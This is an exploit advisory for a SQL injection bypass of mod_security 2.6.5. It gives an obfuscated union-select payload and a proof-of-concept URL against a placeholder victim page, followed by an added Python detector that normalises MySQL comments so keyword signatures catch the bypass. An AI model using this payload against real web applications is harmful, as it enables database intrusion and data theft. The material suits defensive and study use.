# Exploit Title: mod_security 2.6.5 SQL injection bypass.

# Date: 21/04/2012

# Author: Phizo

# Software Link: http://www.modsecurity.org/

# Version: 2.6.5

# Tested on: Windows 7 & Ubuntu 10.04
----------------------------------------------------------------

/** Although I am using union-based injection here, the concept of the bypass is the same for other injection types. **/


[+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
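The payload above evades a keyword signature because MySQL executes the body of a versioned comment (`/*!...*/`) and treats `/**/` as a token separator, while a regex run over the raw parameter sees only comment markers and split keywords. The following detection helper is an added example, not part of the original advisory: it approximates MySQL's comment handling to normalise a request parameter before signature matching, so the same `union ... select` rule that misses the raw payload fires on the normalised form. The simplified lexer and the `naive_signature_matches` rule are my own assumptions, not mod_security code.

```python
import re

# Constructed sample: the bypass payload from this page as a WAF would see it
# after the web server has decoded '+' to spaces.
PAYLOAD = ("12 /*!/**/uNiOn/**/*/ /**/ /**/ /*!/**/seLeCt/**/*/ 1,2,3,"
           "/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10 /**/FROM/**/ "
           "/*!/**/information_schema/**/*//*!. tables*/#")


def mysql_normalize(s: str) -> str:
    """Approximate how MySQL's lexer reads comment-laden input (assumption).

    /*!NNNNN ... */  versioned comment: body is executed, so it is kept;
    /* ... */        ordinary comment: dropped, acts as a separator;
    # and --         rest of the line is a comment.
    Ordinary comments nested inside a versioned comment do not close it.
    """
    out, i, n, depth = [], 0, len(s), 0
    while i < n:
        if s.startswith("/*!", i):          # open versioned comment
            i += 3
            j = i
            while j < n and j - i < 5 and s[j].isdigit():
                j += 1                      # optional 5-digit version
            i, depth = j, depth + 1
            out.append(" ")
        elif s.startswith("/*", i):         # ordinary comment: skip it
            end = s.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif depth and s.startswith("*/", i):   # close versioned comment
            depth, i = depth - 1, i + 2
            out.append(" ")
        elif s[i] == "#" or s.startswith("-- ", i):
            break                           # line comment ends the statement
        else:
            out.append(s[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()


def naive_signature_matches(raw: str) -> bool:
    """Keyword rule applied to the raw parameter, as a simple signature would."""
    return bool(re.search(r"union\s+select", raw, re.I))


def looks_like_union_injection(raw: str) -> bool:
    """Same rule, applied after normalisation: this is the defensive check."""
    return bool(re.search(r"\bunion\b.*?\bselect\b", mysql_normalize(raw)))
```

Applying `mysql_normalize` before matching is the point: the raw payload does not match the naive rule, but its normalised form is a plain `union select` statement.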